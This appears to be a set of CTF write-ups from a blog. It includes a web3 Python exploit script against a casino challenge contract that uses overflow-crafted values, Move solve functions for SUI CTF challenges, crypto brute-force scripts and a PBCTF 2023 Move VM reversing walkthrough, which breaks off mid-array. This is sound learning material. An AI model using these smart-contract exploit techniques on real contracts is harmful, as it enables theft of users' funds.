        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
        # "gas": 10**18
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def buyTokens(val):
    f = open('con_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["buyTokens"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": val,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def requestFreeTokens(val):
    f = open('con_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["requestFreeTokens"](val).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

print(w3.eth.get_storage_at(cont, 1).hex())

requestFreeTokens(0x73ad18042EC0Bec33ACEB8C070c018b53850c43f) # casino contract address
playTokens(2**64 - (target2 & 0xffffffffffffffff), 0, 0, 0)
playTokens(target1 & 0xffffffffffffffff - 4, 6869315878430010885, 2001131302, 0)
playTokens(1, 0, 0, 0)
print(w3.eth.get_storage_at(cont, 1).hex())

SUITF

gss1 — Fri, 3 Mar 2023 09:33:44 +0900

crypto/Avalanche Alert

    public entry fun solve(status: &mut AvalancheAlert::Status, ctx: &mut TxContext) {
        // Enter challenge solution here
        suitfch::AvalancheAlert::alert(status, 1337*1337, ctx);
    }

crypto/Mile High City

original_text = [73,110,115,116,101,97,100,32,111,102,32,
                                         112,117,116,116,105,110,103,32,116,104,
                                         101,32,116,97,120,105,32,100,114,105,118,
                                         101,114,32,111,117,116,32,111,102,32,97,
                                         32,106,111,98,44,32,98,108,111,99,107,99,
                                         104,97,105,110,32,112,117,116,115,32,85,
                                         98,101,114,32,111,117,116,32,111,102,32,
                                         97,32,106,111,98,32,97,110,100,32,108,101,
                                         116,115,32,116,104,101,32,116,97,120,105,
                                         32,100,114,105,118,101,114,115,32,119,111,
                                         114,107,32,119,105,116,104,32,116,104,101,
                                         32,99,117,115,116,111,109,101,114,32,100,
                                         105,114,101,99,116,108,121,46]
from Crypto.Util.number import *
a = 0x7712d02e8b2f08d9ab748bcf206bda1f5ca6190b
a = long_to_bytes(a)

answer = []
for i in range(len(original_text)):
    answer.append(original_text[i] ^ a[i%20])

print(answer)

crypto/Nikola Jokić's Favorites

from Crypto.Util.number import *
from hashlib import sha3_256

print(b'sui '.hex())

for a in range(0x20,127):
    for b in range(0x20,127):
        for c in range(0x20,127):
            for d in range(0x20,127):
                inp = long_to_bytes(a) + long_to_bytes(b) + long_to_bytes(c) + long_to_bytes(d) + long_to_bytes(109) + long_to_bytes(111) + long_to_bytes(118) + long_to_bytes(101)
                if "b696109b889b20e5e50b93e739a0734d94fa092c8289ade07f84a4969dfb039a" == sha3_256(inp).digest().hex():
                    print(inp)
    print(a)

sage

F = IntergerModRing(16724971911849394411)
print(discrete_log(F(7619167469078768920), F(13383215253051849479)))

misc/Your secret is safe with us

    public entry fun solve(users: &mut SafeSecret::Users, ctx: &mut TxContext) {
        // Enter challenge solution here
        let password : vector<u8> = vector[00,00,00,00];
        let secret : vector<u8> = vector[88,88,88,88];
        let secret2 : vector<u8> = vector[79, 84, 84, 69, 82, 83, 69, 67];
        let password2 : vector<u8> = vector[115,110,111,119];
        suitfch::SafeSecret::register(users, password, secret2, ctx);
        suitfch::SafeSecret::set_admin_secret(users, password, secret);
    }

reversing

I used move-disassemble.

First, I should modify table headers of .mv file because address identifier is not aligned.

Then, I got move-instructions.

PBCTF 2023 - rev(move VM)

gss1 — Mon, 20 Feb 2023 17:51:57 +0900

I thought that perfect blue CTF that sponsored by Zellic(web3) would release blockchain challenges

However, the challenge turned out to be VM reversing.. :(

https://coinmarketcap.com/currencies/aptos/

I heard that Aptos was created by Facebook developers and was heavily promoted.

It seemed to use a different kind of VM compared to the traditional EVM and Sealevel, and Move was used in it.

Anyway, we were given a VM and we had to analyze it to extract the flag.
I had no idea how to start analyzing it, so I looked for a disassembler.
Luckily, I found it on the Move official GitHub, and since it wasn't installed on WSL, I ran it on VMWare.

https://github.com/move-language/move

I tried "move disassemble message.mv" but it doesn't work.

Ref)

https://leoq7.com/2023/02/PBCTF-Move-VM/

https://github.com/move-language/move/tree/main/language/tools/move-disassembler

https://github.com/pr0cf5/move-bytecode-llvm-compiler/tree/main/compiler

https://github.com/Knightz1/CTF/tree/main/pbctf_2022

We can modify the official Move code to enable disassembling. (It seems like other CTF teams did the same.)

https://gist.github.com/kangsangsoo/8de518ec9ef364269776c04b349f8797

result of disassemble

https://gist.github.com/kangsangsoo/2096d25bf2a500dd049e7f08faf6ee82

move's instructions

https://github.com/move-language/move/blob/main/language/move-vm/runtime/src/interpreter.rs

B0

The check_flag function takes Arg0 as an argument,

and checks whether its length equals to 58, which is the length of the flag.

B2

Assuming Arg is copied into a vector, we expect the following formula to hold true:
If we solve this formula, we can determine that the flag starts with "pbctf{" and ends with '}'.

(((vec[0] << 48) | (vec[1] << 40) | (vec[2] << 32) | (vec[3] << 24) | (vec[4] << 16) | (vec[5] << 8) | vec[length-1]) ^ 29670774015617385) == 7049012482871828

B4

LdConst instruction is used to convert bytecode to a vector.

The first two values of LdConst (252 and 1) are metadata.
Starting from LdConst[2:], 64 bytes are packed, which creates 252 elements.
Then, initialize index(loc44) to 0.

B5

If len(bytecodes) <= index, the function exits.

B7

bytecode is an 8-byte size value.
It is split into two 4-byte halves:
opcode(loc43) = (bytecode >> 32) & 255
arg(loc41) = bytecode & (2**32-1)

112line ~

Since we know the specific opcodes that will be executed based on the packed vector produced by the LdConst instruction,

we don't need to analyze every opcode defined in the VM.

We only need to focus on the opcodes that will be executed next.

LdConst = [252, 1, 1, 0, 0, 0, 0, 0, 0, 0, 30, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 48, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 0, 0, 0, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 120, 59, 246, 255, 0, 0, 0, 0, 0, 0, 0, 0, 19, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 48, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 0, 0, 0, 0, 0, 0, 0, 58, 0, 0, 0, 20, 0, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 56, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 67, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 7, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 8, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 9, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 250, 24, 177, 131, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 11, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 12, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 13, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 127, 123, 156, 239, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 15, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 16, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 159, 135, 179, 149, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 18, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 19, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 20, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 21, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 101, 155, 55, 49, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 24, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 25, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 171, 83, 202, 163, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 27, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 28, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 29, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 185, 145, 23, 145, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 30, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 31, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 32, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 33, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 161, 133, 218, 233, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 34, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 35, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 36, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 37, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 45, 118, 11, 90, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 38, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 39, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 40, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 41, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 1, 110, 10, 218, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 42, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 43, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 44, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 45, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 133, 137, 39, 72, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 47, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 48, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 49, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 190, 135, 104, 172, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 50, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 51, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 52, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 53, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 188, 209, 165, 38, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 54, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 55, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 56, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 57, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 238, 181, 61, 151, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 69, 0, 0, 0]

import struct
bytecodes = struct.unpack("<252Q", bytes(LdConst[2:]))

for i in range(len(bytecodes):
	bytecodes[i] = (bytecodes[i] >> 32) & 255

bytecodes = [0, 64, 57, 0, 57, 48, 0, 21, 57, 0, 19, 0, 17, 0, 16, 0, 19, 17, 57, 0, 16, 48, 0, 22, 58, 66, 57, 56, 57, 67, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 0, 2, 17, 68, 2, 17, 68, 2, 17, 68, 2, 17, 68, 0, 23, 65, 255, 69]
print(set(bytecodes))

{0, 2, 16, 17, 19, 21, 22, 23, 48, 56, 57, 58, 64, 65, 66, 67, 68, 69, 255}

VM.py


'''
StLoc(idx): pop하고 local[idx]에 저장

LdU64(value): value를 push

CopyLoc(idx): local[idx]를 push (복사)

moveLoc(idx): local[idx]를 push (이동)
'''

LdConst = [252, 1, 1, 0, 0, 0, 0, 0, 0, 0, 30, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 48, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 0, 0, 0, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 120, 59, 246, 255, 0, 0, 0, 0, 0, 0, 0, 0, 19, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 48, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 0, 0, 0, 0, 0, 0, 0, 58, 0, 0, 0, 20, 0, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 56, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 67, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 7, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 8, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 9, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 250, 24, 177, 131, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 11, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 12, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 13, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 127, 123, 156, 239, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 15, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 16, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 159, 135, 179, 149, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 18, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 19, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 20, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 21, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 101, 155, 55, 49, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 24, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 25, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 171, 83, 202, 163, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 27, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 28, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 29, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 185, 145, 23, 145, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 30, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 31, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 32, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 33, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 161, 133, 218, 233, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 34, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 35, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 36, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 37, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 45, 118, 11, 90, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 38, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 39, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 40, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 41, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 1, 110, 10, 218, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 42, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 43, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 44, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 45, 0, 0, 0, 2, 0, 